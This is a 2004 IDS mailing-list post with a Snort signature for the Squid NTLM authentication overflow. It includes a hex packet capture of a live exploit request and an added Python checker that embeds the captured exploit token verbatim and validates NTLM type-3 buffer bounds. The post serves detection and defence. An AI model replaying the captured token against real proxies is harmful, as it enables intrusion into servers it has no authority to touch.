[Snort-sigs] signature: Squid NTLM Auth Overflow Exploit

Aaron W. DeLashmutt awd at ...2442...
Tue Jun 15 11:25:00 EDT 2004


Vulnerability:
http://www.idefense.com/application/poi/display?id=107

Exploit:
http://www.metasploit.com/projects/Framework/exploits.html#squid_ntlm_authenticate
http://www.k-otik.com/exploits/06132004.squid_ntlm_authenticate.pm.php

Signature:
# The hex content is the ASCII string "AAAJCQkJCQkJCQkJ": the base64 encoding of
# the 00 00 09 09 09 ... padding run the public exploit places inside its NTLM
# type-3 token. In the capture below it begins at payload offset 332, so the
# offset:96 skip leaves it in range. Written with backslash continuation so the
# rule can be pasted into a rules file as-is.
alert tcp $EXTERNAL_NET any -> $HOME_NET 3128 (msg:"Squid NTLM Auth Overflow Exploit"; \
    flow:to_server; \
    content:"|4141 414a 4351 6b4a 4351 6b4a 4351 6b4a|"; offset:96; \
    classtype:misc-attack; \
    reference:url,www.idefense.com/application/poi/display?id=107; \
    reference:cve,CAN-2004-0541; \
    sid:3000001; rev:1;)

Packet log:
11:45:01.848725 xxx.xxx.xxx.xxx.34282 > xxx.xxx.xxx.xxx.squid: FP [tcp sum ok]
43:725(682) ack 1 win 5840 <nop,nop,timestamp 2642680769 603356512> (DF) (ttl
50, id 6190, len 734)
0x0000   4500 02de 182e 4000 3206 67c8 a784 4565        E.....@.2.g...Ee
0x0010   d9a0 ff99 85ea 0c38 779b 1018 2162 a46a        .......8w...!b.j
0x0020   8019 16d0 13f9 0000 0101 080a 9d84 1bc1        ................
0x0030   23f6 7d60 5072 6f78 792d 436f 6e6e 6563        #.}`Proxy-Connec
0x0040   7469 6f6e 3a20 4b65 6570 2d41 6c69 7665        tion:.Keep-Alive
0x0050   0d0a 5072 6f78 792d 4175 7468 6f72 697a        ..Proxy-Authoriz
0x0060   6174 696f 6e3a 204e 544c 4d20 546c 524d        ation:.NTLM.TlRM
0x0070   5456 4e54 5541 4142 4141 4141 4277 4379        TVNTUAABAAAABwCy
0x0080   4277 4541 4351 4142 4141 4141 4151 4144        BwEACQABAAAAAQAD
0x0090   4141 4541 4141 413d 0d0a 0d0a 4745 5420        AAEAAAA=....GET.
0x00a0   6874 7470 3a2f 2f77 7777 2e6d 6574 6173        http://www.metas
0x00b0   706c 697a 6f69 742e 636f 6d20 4854 5450        plizoit.com.HTTP
0x00c0   2f31 2e30 0d0a 5072 6f78 792d 436f 6e6e        /1.0..Proxy-Conn
0x00d0   6563 7469 6f6e 3a20 4b65 6570 2d41 6c69        ection:.Keep-Ali
0x00e0   7665 0d0a 5072 6f78 792d 4175 7468 6f72        ve..Proxy-Author
0x00f0   697a 6174 696f 6e3a 204e 544c 4d20 546c        ization:.NTLM.Tl
0x0100   524d 5456 4e54 5541 4144 4141 4141 4c41        RMTVNTUAADAAAALA
0x0110   4573 4154 6741 4141 4142 4141 4541 4151        EsATgAAAABAAEAAQ
0x0120   4141 4141 4541 4151 4142 4141 4141 4151        AAAAEAAQABAAAAAQ
0x0130   4142 4141 4541 4141 4141 4141 4141 6977        ABAAEAAAAAAAAAiw
0x0140   4141 4141 6143 4141 4a42 5155 4642 5155        AAAAaCAAJBQUFBQU
0x0150   4642 5155 4642 5155 4642 5155 4642 5155        FBQUFBQUFBQUFBQU
0x0160   4642 5155 4642 5155 4642 5155 4642 5155        FBQUFBQUFBQUFBQU
0x0170   4642 5158 6a52 2f37 3959 3066 2b2f 2f77        FBQXjR/79Y0f+//w
0x0180   4141 414a 4351 6b4a 4351 6b4a 4351 6b4a        AAAJCQkJCQkJCQkJ
0x0190   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01a0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01b0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01c0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01d0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01e0   4351 6b4a 4351 672b 782f 3265 375a 6443        CQkJCQg+x/2e7ZdC
0x01f0   5430 577a 484a 7353 6542 6378 6342 4151        T0WzHJsSeBcxcBAQ
0x0200   4542 672b 7638 3476 5177 7950 6267 6a46        EBg+v84vQwyPbgjF
0x0210   6b50 7354 4641 7a49 4577 326f 6a6d 6a48        kPsTFAzIEw2ojmjH
0x0220   5952 6948 5946 6a45 3468 6945 344a 7368        YRiHYFjE4hiE4Jsh
0x0230   4749 4744 4449 7350 3649 446c 4177 7762        GIGDDIsP6IDlAwwb
0x0240   466e 7367 6149 2b4d 7942 5744 4461 4f4e        FnsgaI+MyBWDDaON
0x0250   6c30 4332 6535 4174 466e 4f45 6344 6451        l0C2e5AtFnOEcDdQ
0x0260   506a 3459 6a4b 4d4d 6977 416a 4442 7354        Pj4YjKMMiwAjDBsT
0x0270   3549 7a49 4641 342f 6379 7754 4461 7352        5IzIFA4/cywTDasR
0x0280   624d 6754 4c42 5557 6c6a 5979 3876 694f        bMgTLBUWljYy8viO
0x0290   4a43 4d73 6978 4a73 7942 4d73 4778 504d        JCMsixJsyBMsGxPM
0x02a0   7942 5172 442b 7351 334d 6765 5037 5172        yBQrD+sQ3MgeP7Qr
0x02b0   4538 7a49 4577 7756 4670 4c69 3579 6157        E8zIEwwVFpLi5yaW
0x02c0   6b75 5932 6876 694f 4a52 556f 6a67 6d4c        kuY2hviOJRUojgmL
0x02d0   454b 7a49 4542 4151 453d 0d0a 0d0a             EKzIEBAQE=....


---
Aaron W. DeLashmutt <awd at ...2442...>
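The rule above keys on one base64 alignment of the exploit's padding bytes. As an added example (not part of this post, nor code from the Snort or Squid projects), the Python below pulls the NTLM tokens out of Proxy-Authorization headers and judges the type-3 message structurally instead: each security buffer's offset has to land past the fixed header, offset plus length has to stay inside the decoded message, and the LM response cannot be longer than the 24 bytes an LM or LMv2 response always has. The two tokens are copied verbatim from the packet log above (the captured type-3 claims a 300-byte LM response at offset 56 and points its NT, domain and user buffers at offset 1, inside the header). The surrounding HTTP request text, the 52-byte boundary taken from the five mandatory type-3 buffers, the 24-byte LM cap, and the flag bits used by the well-formed-message builder are assumptions of this example. The last function shows why the content match is brittle: the same run of 0x09 bytes only encodes to "AAAJCQkJ..." when it follows NUL bytes at one particular 3-byte alignment.

```python
"""Structural check of NTLM tokens in Squid Proxy-Authorization headers (added example)."""
import base64
import binascii
import struct

# NTLMSSP framing: 8-byte signature, 4-byte little-endian type, then "security
# buffers" of (len:u16, maxlen:u16, offset:u32) that point into the payload.
SIGNATURE = b"NTLMSSP\x00"
TYPE3_BUFFERS = ("lm_response", "nt_response", "domain", "user", "workstation")
# The five mandatory type-3 buffers end at byte 52; a data offset below that lands
# inside the fixed header (assumed boundary; session key, flags, version and MIC
# may follow but are not needed for this check).
MIN_PAYLOAD_OFFSET = 12 + 8 * len(TYPE3_BUFFERS)
# An LM/LMv2 response is 24 bytes; longer is treated as hostile (assumed cap).
MAX_LM_RESPONSE = 24
# ASCII form of the rule's |4141 414a 4351 6b4a ...| content match.
RULE_CONTENT = b"AAAJCQkJCQkJCQkJ"

# Both tokens copied from the packet log in the post: type-1 (NEGOTIATE) from the
# first request, type-3 (AUTHENTICATE, carrying the exploit) from the second.
NEGOTIATE_TOKEN = b"TlRMTVNTUAABAAAABwCyBwEACQABAAAAAQADAAEAAAA="
EXPLOIT_TOKEN = (
    b"TlRMTVNTUAADAAAALA" b"EsATgAAAABAAEAAQ" b"AAAAEAAQABAAAAAQ" b"ABAAEAAAAAAAAAiw"
    b"AAAAaCAAJBQU" + b"FBQU" * 9 + b"FBQXjR/79Y0f+//w"
    b"AAAJ" + b"CQkJ" * 24 + b"CQg+x/2e7ZdC"
    b"T0WzHJsSeBcxcBAQ" b"EBg+v84vQwyPbgjF" b"kPsTFAzIEw2ojmjH" b"YRiHYFjE4hiE4Jsh"
    b"GIGDDIsP6IDlAwwb" b"FnsgaI+MyBWDDaON" b"l0C2e5AtFnOEcDdQ" b"Pj4YjKMMiwAjDBsT"
    b"5IzIFA4/cywTDasR" b"bMgTLBUWljYy8viO" b"JCMsixJsyBMsGxPM" b"yBQrD+sQ3MgeP7Qr"
    b"E8zIEwwVFpLi5yaW" b"kuY2hviOJRUojgmL" b"EKzIEBAQE="
)
# Constructed request pair modelled on the capture; only the tokens are real.
SAMPLE_REQUESTS = (
    b"GET http://www.metasplizoit.com HTTP/1.0\r\nProxy-Connection: Keep-Alive\r\n"
    b"Proxy-Authorization: NTLM " + NEGOTIATE_TOKEN + b"\r\n\r\n"
    b"GET http://www.metasplizoit.com HTTP/1.0\r\nProxy-Connection: Keep-Alive\r\n"
    b"Proxy-Authorization: NTLM " + EXPLOIT_TOKEN + b"\r\n\r\n"
)

def ntlm_tokens(request):
    """Base64 token of every 'Proxy-Authorization: NTLM <token>' header, in order."""
    tokens = []
    for line in request.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"proxy-authorization":
            scheme, _, token = value.strip().partition(b" ")
            if scheme.upper() == b"NTLM" and token.strip():
                tokens.append(token.strip())
    return tokens

def decode_token(token):
    """Strict base64 decode; raises binascii.Error on bad characters or padding."""
    return base64.b64decode(token, validate=True)

def parse_type3(raw):
    """{buffer: (len, maxlen, offset)} for a type-3 message, None for anything else."""
    if len(raw) < MIN_PAYLOAD_OFFSET or not raw.startswith(SIGNATURE):
        return None
    if struct.unpack_from("<I", raw, 8)[0] != 3:
        return None
    return {name: struct.unpack_from("<HHI", raw, 12 + 8 * i)
            for i, name in enumerate(TYPE3_BUFFERS)}

def audit_type3(raw):
    """Structural problems in a type-3 message; an empty list means it looks sane."""
    buffers = parse_type3(raw)
    if buffers is None:
        return []
    findings = []
    for name, (length, _maxlen, offset) in buffers.items():
        if length == 0:
            continue
        if offset < MIN_PAYLOAD_OFFSET:
            findings.append(f"{name}: offset {offset} points inside the fixed header")
        elif offset + length > len(raw):
            findings.append(f"{name}: offset {offset} + len {length} runs past the "
                            f"{len(raw)}-byte message")
        if name == "lm_response" and length > MAX_LM_RESPONSE:
            findings.append(f"{name}: len {length} exceeds a {MAX_LM_RESPONSE}-byte LM response")
    return findings

def audit_request(request):
    """Map token index -> findings for every NTLM token in the request that has any."""
    report = {}
    for i, token in enumerate(ntlm_tokens(request)):
        try:
            findings = audit_type3(decode_token(token))
        except binascii.Error:
            findings = ["token is not valid base64"]
        if findings:
            report[i] = findings
    return report

def build_type3(domain, user, workstation, lm_response, nt_response):
    """Well-formed type-3 message (64-byte header: six buffers plus flags) for comparison."""
    items = [lm_response, nt_response, domain, user, workstation, b""]  # b"": no session key
    base, header, payload = 12 + 8 * len(items) + 4, SIGNATURE + struct.pack("<I", 3), b""
    for item in items:
        header += struct.pack("<HHI", len(item), len(item), base + len(payload))
        payload += item
    return header + struct.pack("<I", 0x00008201) + payload  # arbitrary flag bits

def rule_content_hits(nul_bytes_before_run, run_length=12):
    """True if the rule's content appears when a 0x09 run follows that many NUL bytes."""
    return RULE_CONTENT in base64.b64encode(b"\x00" * nul_bytes_before_run + b"\x09" * run_length)

if __name__ == "__main__":
    for index, findings in audit_request(SAMPLE_REQUESTS).items():
        print(f"token {index}: " + "; ".join(findings))
    print("rule content after 2/1/0 NUL bytes:", [rule_content_hits(n) for n in (2, 1, 0)])
```

Run against the constructed request pair, the first token (type-1) produces nothing and the second is reported four times: the 300-byte LM response and the three buffers whose offset of 1 points back into the signature. A message built by build_type3 with a 24-byte LM response passes clean, while the same builder given a 300-byte LM response is flagged, so the check follows the message structure rather than the exploit's byte pattern. rule_content_hits(2) and rule_content_hits(5) are true but rule_content_hits(0) and rule_content_hits(1) are false: shifting the padding by a single byte changes the base64 text the rule is looking for.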